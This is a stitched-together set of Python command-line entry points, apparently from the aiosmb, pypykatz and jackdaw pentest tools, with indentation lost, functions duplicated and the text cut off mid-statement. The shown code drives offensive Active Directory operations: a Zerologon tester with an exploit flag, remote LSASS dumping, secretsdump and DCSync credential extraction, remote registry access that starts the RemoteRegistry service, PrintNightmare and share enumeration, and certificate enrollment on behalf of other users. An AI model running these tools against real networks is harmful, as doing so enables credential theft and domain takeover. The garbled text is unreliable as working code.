def main():
import argparse
parser = argparse.ArgumentParser(description='Event query example')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('--src',
default="Security",
help='log source to query')
parser.add_argument('-q', '--query', default="*", help='query string')
parser.add_argument('-m',
'--max_entries',
type=int,
default=100,
help='max element count to retrieve')
parser.add_argument(
'smb_url',
help=
'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]'
)
args = parser.parse_args()
print(__banner__)
if args.verbose >= 1:
logger.setLevel(logging.DEBUG)
asyncio.run(
amain(args.smb_url,
src=args.src,
query=args.query,
max_entries=args.max_entries))
def main():
import argparse
import platform
import logging
from asysocks import logger as sockslogger
parser = argparse.ArgumentParser(description='Zerologon tester')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-e',
'--exploit',
action='store_true',
help='perform the expolit')
parser.add_argument('dc_ip', help='IP address of the domain controller')
parser.add_argument(
'dc_name', help='NETBIOS NAME of the domain controller (without $)')
args = parser.parse_args()
if args.verbose >= 1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
sockslogger.setLevel(1)
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
asyncio.run(run(args.dc_name, args.dc_ip, args.exploit))
def main():
import os
import argparse
parser = argparse.ArgumentParser(description='auto collector for MP')
#parser.add_argument('-v', '--verbose', action='count', default=0, help='Increase verbosity, can be stacked')
#parser.add_argument('sql', help='SQL connection string in URL format')
parser.add_argument('-q', '--sqlite_folder_path', default='./workdir', help='A folder to store enumeration results in')
parser.add_argument('-m', '--multiplexor', default = 'ws://127.0.0.1:9999', help='multiplexor connection string in URL format')
parser.add_argument('-p', '--parallel_cnt', default = get_cpu_count(), type=int, help='agent count')
parser.add_argument('-o', '--progress-out-file', default = None, help='Filename to write progress to')
parser.add_argument('-s', '--start-ui', action='store_true', help='Automatically start jackdaw UI after successful enumeration')
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG)
msldaplogger.setLevel(logging.INFO)
smblogger.setLevel(1)
logging.getLogger('websockets.server').setLevel(logging.ERROR)
logging.getLogger('websockets.client').setLevel(logging.ERROR)
logging.getLogger('websockets.protocol').setLevel(logging.ERROR)
logging.getLogger('aiosmb').setLevel(100)
logging.getLogger('asysocks').setLevel(100)
mas = MultiplexorAutoStart(args.multiplexor, args.sqlite_folder_path, parallel_cnt=args.parallel_cnt, progress_file_name = args.progress_out_file, start_ui = args.start_ui)
asyncio.run(mas.run())
def main():
import argparse
import platform
import logging
from asysocks import logger as asylogger
parser = argparse.ArgumentParser(description='Interactive SMB client')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-s', '--silent', action='store_true', help='do not print banner')
parser.add_argument('-n', '--no-interactive', action='store_true')
parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]')
parser.add_argument('commands', nargs='*')
args = parser.parse_args()
if args.silent is False:
print(__banner__)
if args.verbose >=1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
sockslogger.setLevel(1)
asylogger.setLevel(1)
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
asyncio.run(amain(args))
async def amain():
import argparse
import sys
parser = argparse.ArgumentParser(description='SMB Protocol enumerator. Tells which dialects suported by the remote end')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
parser.add_argument('-t', '--timeout', type=int, default=50, help='Timeout for each connection')
parser.add_argument('--signing', action='store_true', help='Only check for the singing properties. (faster)')
parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
parser.add_argument('--json', action='store_true', help='Output in JSON format')
parser.add_argument('--tsv', action='store_true', help='Output in TSV format. (TAB Separated Values)')
parser.add_argument('--progress', action='store_true', help='Show progress bar')
parser.add_argument('-o', '--out-file', help='Output file path.')
parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
args = parser.parse_args()
if args.verbose >=1:
logger.setLevel(logging.INFO)
if args.verbose > 2:
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
smb_url = SMBConnectionURL('smb2+ntlm-password://dummy\\dummy:[email protected]')
enumerator = SMBProtocolEnum(smb_url, worker_count = args.smb_worker_count, timeout = args.timeout, only_signing = args.signing, show_pbar=args.progress, out_file=args.out_file, output_type=output_type)
notfile = []
if len(args.targets) == 0 and args.stdin is True:
enumerator.target_gens.append(ListTargetGen(sys.stdin))
else:
for target in args.targets:
try:
f = open(target, 'r')
f.close()
enumerator.target_gens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
enumerator.target_gens.append(ListTargetGen(notfile))
if len(enumerator.target_gens) == 0:
print('[-] No suitable targets were found!')
return
await enumerator.run()
if args.progress is False:
print('[+] Done!')
async def amain():
import argparse
import sys
parser = argparse.ArgumentParser(description='SMB Protocol enumerator. Tells which dialects suported by the remote end')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
parser.add_argument('-t', '--timeout', type=int, default=50, help='Timeout for each connection')
parser.add_argument('--signing', action='store_true', help='Only check for the singing properties. (faster)')
parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
args = parser.parse_args()
if args.verbose >=1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
enumerator = SMBProtocolEnum(worker_count = args.smb_worker_count, timeout = args.timeout, only_signing = args.signing)
notfile = []
if len(args.targets) == 0 and args.stdin is True:
enumerator.target_gens.append(ListTargetGen(sys.stdin))
else:
for target in args.targets:
try:
f = open(target, 'r')
f.close()
enumerator.target_gens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
enumerator.target_gens.append(ListTargetGen(notfile))
if len(enumerator.target_gens) == 0:
print('[-] No suitable targets were found!')
return
await enumerator.run()
print('[+] Done!')
def main():
import argparse
import platform
parser = argparse.ArgumentParser(description='Interactive SMB client')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-n', '--no-interactive', action='store_true')
parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]')
parser.add_argument('commands', nargs='*')
args = parser.parse_args()
print(__banner__)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
sockslogger.setLevel(1)
print(args.commands)
asyncio.run(amain(args))
def main():
import argparse
parser = argparse.ArgumentParser(description='Request certificate via ICPR-RPC service')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('--pfx-file', help = 'Output PFX file name. Default is cert_<rand>.pfx')
parser.add_argument('--pfx-pass', default = 'admin', help = 'Ouput PFX file password')
parser.add_argument('--alt-name', help = 'Alternate username. Preferable username@FQDN format')
parser.add_argument('--cn', help = 'CN (common name). In case you want to set it to something custom. Preferable username@FQDN format')
agentenroll = parser.add_argument_group('Agent enrollment parameters')
agentenroll.add_argument('--on-behalf', help = 'On behalf username')
agentenroll.add_argument('--enroll-cert', help = 'Agent enrollment PFX file')
agentenroll.add_argument('--enroll-pass', help = 'Agent enrollment PFX file password')
parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:[email protected]')
parser.add_argument('service', help = 'Enrollment service endpoint')
parser.add_argument('template', help = 'Certificate template name to use')
args = parser.parse_args()
print(__banner__)
if args.verbose >=1:
logger.setLevel(logging.DEBUG)
asyncio.run(
amain(
args.smb_url,
args.service,
args.template,
args.alt_name,
args.on_behalf,
args.cn,
args.pfx_file,
args.pfx_pass,
args.enroll_cert,
args.enroll_pass
)
)
def main():
import argparse
parser = argparse.ArgumentParser(description='SMB file downloader')
parser.add_argument('-v', '--verbose', action='count', default=0)
#parser.add_argument('-r', '--recursive', action='store_true', help='Recirsively donwload all files from the remote folder')
parser.add_argument('--progress', action='store_true', help='Show progress')
parser.add_argument('-o', '--out-file', help='Output file name. Optional.')
parser.add_argument('url', help='SMB URL with full file path. Example: smb2+ntlm-password://TEST\\Administrator:[email protected]/C$/test.txt')
args = parser.parse_args()
if args.verbose >=1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
asyncio.run(amain(args.url, args.out_file))
async def run_live(self, args):
if platform.system().lower() != 'windows':
raise Exception('Live commands only work on Windows!')
from aiosmb import logger as smblog
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.livesmbcommand == 'console':
from aiosmb.examples.smbclient import amain
from winacl.functions.highlevel import get_logon_info
info = get_logon_info()
la = SMBCMDArgs()
la.smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (
args.protocol_version, args.authmethod, info['domain'],
info['username'], args.host)
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
async def run_live(self, args):
if platform.system().lower() != 'windows':
raise Exception('Live commands only work on Windows!')
from aiosmb import logger as smblog
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.livesmbcommand == 'console':
from aiosmb.examples.smbclient import amain
from winacl.functions.highlevel import get_logon_info
info = get_logon_info()
la = SMBCMDArgs()
la.smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (
args.protocol_version, args.authmethod, info['domain'],
info['username'], args.host)
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
elif args.livesmbcommand == 'shareenum':
from pypykatz.smb.shareenum import shareenum
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
exclude_share = []
if args.es is not None:
exclude_share = args.es
exclude_dir = []
if args.ed is not None:
exclude_dir = args.ed
ldap_url = 'auto'
if args.skip_ldap is True:
ldap_url = None
exclude_target = []
if args.et is not None:
exclude_target = args.et
await shareenum(
smb_url='auto',
targets=args.target,
smb_worker_count=args.worker_count,
depth=args.depth,
out_file=args.out_file,
progress=args.progress,
max_items=args.maxitems,
dirsd=args.dirsd,
filesd=args.filesd,
authmethod=args.authmethod,
protocol_version=args.protocol_version,
output_type=output_type,
max_runtime=args.max_runtime,
exclude_share=exclude_share,
exclude_dir=exclude_dir,
ldap_url=ldap_url,
exclude_target=exclude_target,
)
async def amain():
import argparse
import sys
import logging
parser = argparse.ArgumentParser(
description='Registry manipulation via SMB')
SMBConnectionParams.extend_parser(parser)
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument(
'url',
help=
'Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"'
)
parser.add_argument(
'commands',
nargs='*',
help=
'Commands in the following format: "r:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest:Negotiate"'
)
args = parser.parse_args()
if args.verbose >= 1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
commands = []
smb_url = None
if args.url is not None:
smb_url = args.url
else:
try:
smb_url = SMBConnectionParams.parse_args(args)
except Exception as e:
print(
'Either URL or all connection parameters must be set! Error: %s'
% str(e))
sys.exit(1)
#pre-parsing commands
for cmd in args.commands:
c, path = cmd.split(':', 1)
c = SMBREG_COMMAND(c.upper())
commands.append((c, path))
connection = SMBConnectionURL(smb_url).get_connection()
_, err = await connection.login()
if err is not None:
print('Login failed! Reason: %s' % str(err))
return
machine = SMBMachine(connection)
#async for srv, err in machine.list_services():
# if err is not None:
# print(err)
# return
# print(srv)
registry_srv_status, err = await machine.check_service_status(
"RemoteRegistry")
if err is not None:
print('Check service status error! %s' % err)
return
if registry_srv_status != SMBServiceStatus.RUNNING:
logger.info('RemoteRegistry is not running! Starting it now..')
res, err = await machine.enable_service("RemoteRegistry")
if err is not None:
print(err)
return
await asyncio.sleep(5) #waiting for service to start up
reg_api, err = await machine.get_regapi()
if err is not None:
print(err)
return
## do stuff
for cmd, target in commands:
if cmd == SMBREG_COMMAND.READ:
regpath, name = target.split(':', 1)
hkey, err = await reg_api.OpenRegPath(regpath)
if err is not None:
print(err)
continue
val_type, value, err = await reg_api.QueryValue(hkey, name)
if err is not None:
print(err)
continue
print(value)
elif cmd == SMBREG_COMMAND.ENUMVALUE:
hkey, err = await reg_api.OpenRegPath(target)
if err is not None:
print(err)
continue
i = 0
while True:
value_name, value_type, value_data, err = await reg_api.EnumValue(
hkey, i)
i += 1
if err is not None:
print(err)
break
print(value_name)
print(value_type)
print(value_data)
elif cmd == SMBREG_COMMAND.ENUMKEY:
hkey, err = await reg_api.OpenRegPath(target)
if err is not None:
print(err)
continue
i = 0
while True:
res, err = await reg_api.EnumKey(hkey, i)
i += 1
if err is not None:
print(err)
break
print(res)
async def run(self, args):
from aiosmb import logger as smblog
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.smb_module == 'lsassfile':
from pypykatz.smb.lsassutils import lsassfile
mimi = await lsassfile(args.url, chunksize=args.chunksize, packages=args.packages)
self.process_results({'smbfile':mimi}, [], args)
elif args.smb_module == 'lsassdump':
from pypykatz.smb.lsassutils import lsassdump
mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
self.process_results({'smbfile':mimi}, [], args)
elif args.smb_module == 'secretsdump':
from pypykatz.smb.lsassutils import lsassdump
from pypykatz.smb.regutils import regdump
from pypykatz.smb.dcsync import dcsync
try:
mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
if mimi is not None:
self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
try:
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile+'_registry.txt', args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get registry secrets')
try:
if args.outfile is not None:
outfile = open(args.outfile+'_dcsync.txt', 'w', newline = '')
async for secret in dcsync(args.url):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
finally:
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'dcsync':
from pypykatz.smb.dcsync import dcsync
if args.outfile is not None:
outfile = open(args.outfile, 'w', newline = '')
async for secret in dcsync(args.url, args.username):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
if args.outfile is not None:
outfile.close()
elif args.smb_module == 'regdump':
from pypykatz.smb.regutils import regdump
po = await regdump(args.url)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'regfile':
from pypykatz.smb.regutils import regfile
po = await regfile(args.url, args.system, sam = args.sam, security = args.security, software = args.software)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
elif args.smb_module == 'shareenum':
from pypykatz.smb.shareenum import shareenum
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
exclude_share = []
if args.es is not None:
exclude_share = args.es
exclude_dir = []
if args.ed is not None:
exclude_dir = args.ed
exclude_target = []
if args.et is not None:
exclude_target = args.et
await shareenum(
args.smb_url,
targets = args.target,
smb_worker_count = args.worker_count,
depth = args.depth,
out_file = args.out_file,
progress = args.progress,
max_items = args.maxitems,
dirsd = args.dirsd,
filesd = args.filesd,
output_type = output_type,
max_runtime = args.max_runtime,
exclude_share = exclude_share,
exclude_dir = exclude_dir,
ldap_url = args.ldap,
exclude_target = exclude_target,
)
elif args.smb_module == 'client':
from aiosmb.examples.smbclient import amain
la = SMBCMDArgs()
la.smb_url = args.url
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
async def run_live(self, args):
if platform.system().lower() != 'windows':
raise Exception('Live commands only work on Windows!')
from aiosmb import logger as smblog
from winacl.functions.highlevel import get_logon_info
info = get_logon_info()
if args.livesmbcommand != 'shareenum':
smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (args.protocol_version, args.authmethod, info['domain'], info['username'], args.host)
if args.verbose == 0:
smblog.setLevel(100)
elif args.verbose == 1:
smblog.setLevel(level=logging.INFO)
else:
level = 5 - args.verbose
smblog.setLevel(level=level)
if args.livesmbcommand == 'client':
from aiosmb.examples.smbclient import amain
la = SMBCMDArgs()
la.smb_url = smb_url
la.verbose = args.verbose
if args.commands is not None and len(args.commands) > 0:
la.commands = []
if args.commands[0] == 'help':
la.commands = ['help']
else:
if args.commands[0] != 'login':
la.commands.append('login')
for command in args.commands:
la.commands.append(command)
await amain(la)
elif args.livesmbcommand == 'lsassdump':
from pypykatz.smb.lsassutils import lsassdump
mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
self.process_results({'smbfile':mimi}, [], args)
elif args.livesmbcommand == 'secretsdump':
from pypykatz.smb.lsassutils import lsassdump
from pypykatz.smb.regutils import regdump
from pypykatz.smb.dcsync import dcsync
try:
mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
if mimi is not None:
self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
try:
po = await regdump(smb_url)
if po is not None:
if args.outfile:
po.to_file(args.outfile+'_registry.txt', args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to get registry secrets')
try:
if args.outfile is not None:
outfile = open(args.outfile+'_dcsync.txt', 'w', newline = '')
async for secret in dcsync(smb_url):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
except Exception as e:
logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
finally:
if args.outfile is not None:
outfile.close()
elif args.livesmbcommand == 'dcsync':
from pypykatz.smb.dcsync import dcsync
if args.outfile is not None:
outfile = open(args.outfile, 'w', newline = '')
async for secret in dcsync(smb_url, args.username):
if args.outfile is not None:
outfile.write(str(secret))
else:
print(str(secret))
if args.outfile is not None:
outfile.close()
elif args.livesmbcommand == 'regdump':
from pypykatz.smb.regutils import regdump
po = await regdump(smb_url)
if po is not None:
if args.outfile:
po.to_file(args.outfile, args.json)
else:
if args.json:
print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
else:
print(str(po))
elif args.livesmbcommand == 'shareenum':
from pypykatz.smb.shareenum import shareenum
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
exclude_share = []
if args.es is not None:
exclude_share = args.es
exclude_dir = []
if args.ed is not None:
exclude_dir = args.ed
ldap_url = 'auto'
if args.skip_ldap is True:
ldap_url = None
exclude_target = []
if args.et is not None:
exclude_target = args.et
await shareenum(
smb_url = 'auto',
targets = args.target,
smb_worker_count = args.worker_count,
depth = args.depth,
out_file = args.out_file,
progress = args.progress,
max_items = args.maxitems,
dirsd = args.dirsd,
filesd = args.filesd,
authmethod = args.authmethod,
protocol_version = args.protocol_version,
output_type = output_type,
max_runtime = args.max_runtime,
exclude_share = exclude_share,
exclude_dir = exclude_dir,
ldap_url = ldap_url,
exclude_target = exclude_target,
)
async def amain():
import argparse
import sys
from aiosmb.commons.connection.params import SMBConnectionParams
epilog = """
Output legend:
[SHARE] C$ is accessible
[SRV] Remote Service Manager is accessible
[REG] Remote registry is accessible
[E] Error
[P] Progress (current/total)
"""
parser = argparse.ArgumentParser(description='SMB Share enumerator', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=epilog)
SMBConnectionParams.extend_parser(parser)
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
parser.add_argument('--url', help='Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"')
parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
args = parser.parse_args()
if args.verbose >=1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
smb_url = None
if args.url is not None:
smb_url = args.url
else:
try:
smb_url = SMBConnectionParams.parse_args(args)
except Exception as e:
print('Either URL or all connection parameters must be set! Error: %s' % str(e))
sys.exit(1)
enumerator = SMBAdminCheck(smb_url, worker_count = args.smb_worker_count)
notfile = []
if len(args.targets) == 0 and args.stdin is True:
enumerator.target_gens.append(ListTargetGen(sys.stdin))
else:
for target in args.targets:
try:
f = open(target, 'r')
f.close()
enumerator.target_gens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
enumerator.target_gens.append(ListTargetGen(notfile))
if len(enumerator.target_gens) == 0:
print('[-] No suitable targets were found!')
return
await enumerator.run()
async def run(args):
print(__banner__)
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
jdlogger.setLevel(logging.INFO)
msldaplogger.setLevel(logging.WARNING)
smblogger.setLevel(logging.CRITICAL)
elif args.verbose == 1:
logging.basicConfig(level=logging.DEBUG)
jdlogger.setLevel(logging.DEBUG)
msldaplogger.setLevel(logging.INFO)
smblogger.setLevel(logging.INFO)
elif args.verbose > 1:
logging.basicConfig(level=1)
msldaplogger.setLevel(logging.DEBUG)
jdlogger.setLevel(1)
smblogger.setLevel(1)
if not args.sql:
print(
'SQL connection identification is missing! You need to provide the --sql parameter'
)
sys.exit()
db_conn = args.sql
if args.sql.lower().startswith('sqlite'):
os.environ['JACKDAW_SQLITE'] = '1'
if args.command == 'enum':
smb_mgr = construct_smbdef(args)
ldap_mgr = construct_ldapdef(args)
mgr = LDAPEnumeratorManager(db_conn,
ldap_mgr,
agent_cnt=args.ldap_workers)
adifo_id = await mgr.run()
jdlogger.info('ADInfo entry successfully created with ID %s' %
adifo_id)
mgr = SMBGathererManager(smb_mgr,
worker_cnt=args.smb_workers,
queue_size=args.smb_queue_size)
mgr.gathering_type = ['all']
mgr.db_conn = db_conn
mgr.target_ad = adifo_id
await mgr.run()
if args.smb_share_enum is True:
settings_base = SMBShareGathererSettings(adifo_id, smb_mgr, None,
None, None)
settings_base.dir_depth = args.smb_folder_depth
mgr = ShareGathererManager(settings_base,
db_conn=db_conn,
worker_cnt=args.smb_workers)
mgr.run()
elif args.command == 'dbinit':
create_db(db_conn)
elif args.command == 'adinfo':
session = get_session(db_conn)
from jackdaw.dbmodel.adinfo import JackDawADInfo
from jackdaw.utils.table import print_table
rows = [['Ad ID', 'domain name', 'scantime']]
for did, distinguishedName, creation in session.query(
JackDawADInfo).with_entities(JackDawADInfo.id,
JackDawADInfo.distinguishedName,
JackDawADInfo.fetched_at).all():
name = distinguishedName.replace('DC=', '')
name = name.replace(',', '.')
rows.append([str(did), name, creation.isoformat()])
print_table(rows)
elif args.command == 'ldap':
ldap_mgr = construct_ldapdef(args)
ldap_conn = ldap_mgr.get_client()
mgr = LDAPEnumeratorManager(db_conn,
ldap_mgr,
agent_cnt=args.ldap_workers,
queue_size=args.ldap_queue_size,
ad_id=args.ad_id)
adifo_id = await mgr.run()
jdlogger.info('ADInfo entry successfully created with ID %s' %
adifo_id)
elif args.command in ['shares', 'sessions', 'localgroups', 'smball']:
if args.command == 'smball':
args.command = 'all'
smb_mgr = construct_smbdef(args)
mgr = SMBGathererManager(smb_mgr,
worker_cnt=args.smb_workers,
queue_size=args.smb_queue_size)
mgr.gathering_type = [args.command]
mgr.db_conn = db_conn
mgr.lookup_ad = args.lookup_ad
if args.ldap_url:
ldap_mgr = construct_ldapdef(args)
ldap_conn = ldap_mgr.get_client()
mgr.ldap_conn = ldap_conn
if args.ad_id:
mgr.target_ad = args.ad_id
if args.target_file:
mgr.targets_file = args.target_file
await mgr.run()
elif args.command == 'files':
if args.src == 'domain':
if not args.ad_id:
raise Exception('ad-id parameter is mandatory in ldap mode')
mgr = SMBConnectionURL(args.smb_url)
settings_base = SMBShareGathererSettings(args.ad_id, mgr, None,
None, None)
settings_base.dir_depth = args.smb_folder_depth
settings_base.dir_with_sd = args.with_sid
settings_base.file_with_sd = args.with_sid
mgr = ShareGathererManager(settings_base,
db_conn=db_conn,
worker_cnt=args.smb_workers)
mgr.run()
# elif args.src == 'file':
# if not args.target_file:
# raise Exception('target-file parameter is mandatory in file mode')
#
# args.target_file
# args.lookup_ad
# args.with_sid
# args.smb_workers
#
# elif args.src == 'ldap':
# if not args.ldap_url:
# raise Exception('ldap-url parameter is mandatory in ldap mode')
# args.lookup_ad
# args.with_sid
# args.smb_workers
#
#
#
# elif args.src == 'cmd':
elif args.command == 'creds':
creds = JackDawCredentials(args.db_conn, args.domain_id)
creds.add_credentials_impacket(args.impacket_file)
elif args.command == 'passwords':
creds = JackDawCredentials(args.db_conn)
creds.add_cracked_passwords(args.potfile, args.disable_usercheck,
args.disable_passwordcheck)
elif args.command == 'uncracked':
creds = JackDawCredentials(args.db_conn, args.domain_id)
creds.get_uncracked_hashes(args.hash_type, args.history)
elif args.command == 'cracked':
creds = JackDawCredentials(args.db_conn, args.domain_id)
creds.get_cracked_info()
elif args.command == 'nest':
from jackdaw.nest.wrapper import NestServer
debug = bool(args.verbose)
server = NestServer(args.sql,
bind_ip=args.ip,
bind_port=args.port,
debug=debug)
server.run()
async def amain():
import argparse
import sys
from aiosmb.commons.connection.params import SMBConnectionParams
epilog = """
Output legend:
[S] Share
[D] Dictionary
[F] File
[E] Error
[M] Maxed (max items limit reached for directory)
[P] Progress (current/total)
"""
parser = argparse.ArgumentParser(description='SMB Printnightmare enumerator', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=epilog)
SMBConnectionParams.extend_parser(parser)
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-w', '--smb-worker-count', type=int, default=100, help='Parallell count')
parser.add_argument('-o', '--out-file', help='Output file path.')
parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
parser.add_argument('--url', help='Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"')
parser.add_argument('--progress', action='store_true', help='Show progress bar')
parser.add_argument('--json', action='store_true', help='Output in JSON format')
parser.add_argument('--tsv', action='store_true', help='Output in TSV format. (TAB Separated Values)')
parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
args = parser.parse_args()
if args.verbose >=1:
logger.setLevel(logging.DEBUG)
if args.verbose > 2:
print('setting deepdebug')
logger.setLevel(1) #enabling deep debug
asyncio.get_event_loop().set_debug(True)
logging.basicConfig(level=logging.DEBUG)
output_type = 'str'
if args.json is True:
output_type = 'json'
if args.tsv is True:
output_type = 'tsv'
smb_url = None
if args.url is not None:
smb_url = args.url
else:
try:
smb_url = SMBConnectionParams.parse_args(args)
except Exception as e:
print('Either URL or all connection parameters must be set! Error: %s' % str(e))
sys.exit(1)
enumerator = SMBPrintnightmareEnum(
smb_url,
worker_count = args.smb_worker_count,
out_file = args.out_file,
show_pbar = args.progress,
output_type = output_type,
)
notfile = []
if len(args.targets) == 0 and args.stdin is True:
enumerator.target_gens.append(ListTargetGen(sys.stdin))
else:
for target in args.targets:
try:
f = open(target, 'r')
f.close()
enumerator.target_gens.append(FileTargetGen(target))
except:
notfile.append(target)
if len(notfile) > 0:
enumerator.target_gens.append(ListTargetGen(notfile))
if len(enumerator.target_gens) == 0:
enumerator.enum_url = True
await enumerator.run()
async def amain():
import argparse
import sys
from aiosmb.commons.connection.params import SMBConnectionParams
parser = argparse.ArgumentParser(description='SMB Share enumerator')
SMBConnectionParams.extend_parser(parser)
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-s',
'--stdin',
action='store_true',
help='Read targets from stdin')
parser.add_argument(
'-r',
'--recursive',
action='store_true',
help='Recirsively donwload all files from the remote folder')
parser.add_argument('--progress',
action='store_true',
help='Show progress')
parser.add_argument(
'--url',
help=
